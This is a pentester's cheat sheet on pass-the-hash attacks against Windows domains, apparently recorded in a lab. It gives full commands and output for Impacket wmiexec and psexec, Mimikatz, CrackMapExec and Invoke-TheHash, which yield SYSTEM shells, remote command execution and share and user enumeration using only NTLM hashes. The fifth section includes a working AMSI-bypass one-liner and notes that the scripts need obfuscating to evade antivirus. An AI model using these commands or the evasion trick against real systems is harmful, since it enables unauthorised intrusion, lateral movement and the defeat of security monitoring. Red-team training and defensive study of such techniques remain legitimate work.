======================================================================================================================
Pass-The-Hash attack
======================================================================================================================

Pass-the-hash is a lateral movement technique in which an attacker can abuse the challenge-and-response nature of the NTLMv2 authentication protocol
to authenticate as a user with only the NTLM hash of the user's password.

Numerous tools can be used to perform a Pass-the-hash attack such as the Impacket toolkit (wmiexec.py, psexec.py,..), Mimikatz and CrackMapExec.
> https://github.com/SecureAuthCorp/impacket
> https://github.com/gentilkiwi/mimikatz
> https://github.com/byt3bl33d3r/CrackMapExec
> https://github.com/Kevin-Robertson/Invoke-TheHash
> ...

Index
======
1. WMIexec (Impacket version)
2. PSexec (Impacket version)
3. Mimikatz
4. CrackMapExec
5. Invoke-TheHash (PowerShell scripts)

========================================================================================================================
Example 1 - WMIexec (Impacket version)
========================================================================================================================

jeff@kali-Linux:~$ wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:ad5f04d33d00db5f06237<SNIP> administrator@192.168.1.50
Impacket v0.9.21.dev1 - Copyright 2020 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands

C:\> whoami
win-evagj1t16qd\administrator


========================================================================================================================
Example 2 - PSexec (Impacket version)
========================================================================================================================

jeff@kali-Linux:~$ psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:k3d089gf890dad5f04d7<SNIP> security-lab/qualys@192.168.1.50
Impacket v0.9.21.dev1 - Copyright 2020 SecureAuth Corporation

Password:
[*] Requesting shares on 192.168.1.50.....
[*] Found writable share ADMIN$
[*] Uploading file pXRmNpEn.exe
[*] Opening SVCManager on 192.168.1.50.....
[*] Creating service TjVN on 192.168.1.50.....
[*] Starting service TjVN.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> hostname
TEMP-DC


========================================================================================================================
Example 3 - Mimikatz
========================================================================================================================

mimikatz# privilege::debug
Privilege '20' OK

mimikatz# sekurlsa::pth /user:qualys /domain:security-lab /ntlm:k3d089gf890dad5f04d7<SNIP> /run:cmd
user    : qualys
domain  : security-lab
program : cmd.exe
NTLM    : k3d089gf890dad5f04d7<SNIP>
  |  PID  16182
  |  TID  14854
  |  LUID 0 ; 48678558 (00000000:02e6c69e)
  \_ msv1_0   - data copy @ 000000B9EDE63080 : OK !
  \_ kerberos - data copy @ 000000B9EDDB34E8
   \_ aes256_hmac       -> null
   \_ aes128_hmac       -> null
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
 
 mimikatz# 

=> A CMD shell pops up (running as 'security-lab\qualys')

Microsoft Windows [Version 10.0.18363.418]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\> whoami
security-lab\qualys

C:\> Powershell -exec bypass

PS C:\> whoami
security-lab\qualys

PS C:\> Enter-PSSession -Computername TEMP-DC.Security-Test-Lab.Local 
[TEMP-DC.Security-Test-Lab.Local]: PS C:\Users\qualys\Documents> hostname
TEMP-DC


========================================================================================================================
Example 4 - CrackMapExec
========================================================================================================================

jeff@kali-Linux:~$ crackmapexec smb 192.168.1.50 -u administrator -H 'ad5f04d33d00db5f06237<SNIP>' --shares

SMB         192.168.1.50    445    WIN-EVAGJ1T16QD  [*] Windows Server 2012 R2 Standard 9600 x64 (name:WIN-EVAGJ1T16QD) (domain:WIN-EVAGJ1T16QD) (signing:False) (SMBv1:True)
SMB         192.168.1.50    445    WIN-EVAGJ1T16QD  [+] WIN-EVAGJ1T16QD\administrator ad5f04d33d00db5f06237<SNIP> (Pwn3d!)
SMB         192.168.1.50    445    WIN-EVAGJ1T16QD  [+] Enumerated shares
SMB         192.168.1.50    445    WIN-EVAGJ1T16QD  Share           Permissions     Remark
SMB         192.168.1.50    445    WIN-EVAGJ1T16QD  -----           -----------     ------
SMB         192.168.1.50    445    WIN-EVAGJ1T16QD  ADMIN$          READ,WRITE      Remote Admin
SMB         192.168.1.50    445    WIN-EVAGJ1T16QD  C$              READ,WRITE      Default share
SMB         192.168.1.50    445    WIN-EVAGJ1T16QD  IPC$                            Remote IPC


jeff@kali-Linux:~$ crackmapexec smb 192.168.1.50 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:ad5f04d33d00db5f06237<SNIP>' -x "whoami"

SMB         192.168.1.50    445    WIN-EVAGJ1T16QD  [*] Windows Server 2012 R2 Standard 9600 x64 (name:WIN-EVAGJ1T16QD) (domain:WIN-EVAGJ1T16QD) (signing:False) (SMBv1:True)
SMB         192.168.1.50    445    WIN-EVAGJ1T16QD  [+] WIN-EVAGJ1T16QD\administrator aad3b435b51404eeaad3b435b51404ee:ad5f04d33d00db5f06237<SNIP> (Pwn3d!)
<SNIP>

========================================================================================================================
Example 5 - Invoke-TheHash (PowerShell)
========================================================================================================================

Source: https://github.com/Kevin-Robertson/Invoke-TheHash

> Invoke-WMIExec.ps1
> Invoke-SMBEnum.ps1
> Invoke-SMBExec.ps1

Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks.
WMI and SMB connections are accessed through the .NET TCPClient. 
Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. 
Local administrator privilege is not required client-side.

Note: These powershell scripts are flagged by AV so it is necessary to bypass the AMSI and obfuscate them to avoid detection.

PoC - Invoke-SMBEnum.ps1
-------------------------

Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Users\Administrator\Documents\Tools-AD> $a = [Ref].Assembly.GetTypes();ForEach($b in $a) {if ($b.Name -like "*iutils") {$c = $b}};$d = $c.GetFields('NonPublic,Static');ForEach($e in $d) {if ($e.Name -like "*itFailed") {$f = $e}};$f.SetValue($null,$true)

PS C:\Users\Administrator\Documents\Tools-AD> . .\Invoke-SMBEnum.ps1

PS C:\Users\Administrator\Documents\Tools-AD> Invoke-SMBEnum -Target 192.168.1.73 -Domain .  -Username pentester -Hash c4b1b6e2ee25d932f3bb6d232c2c6972

192.168.1.73 Administrators Group Members:

Username      Domain     Type
--------      ------     ----
Administrator SQLSERVER1 user
Pentester     SQLSERVER1 user
sqlservice    COMPANY    group

192.168.1.73 Users:

Username        RID
--------        ---
Administrator   500
Guest           501
HR-app         1008
monitoring     1009
Pentester      1001
sqlservicetest 1011


192.168.1.73 NetSessions:

Username  Source
--------  ------
pentester \\192.168.1.113


192.168.1.73 Shares:

Share  Description   Access Mask
-----  -----------   -----------
ADMIN$ Remote Admin  00000000000000000000000000000000
C$     Default share 00000000000000000000000000000000
IPC$   Remote IPC    00000001000111110000000111111111
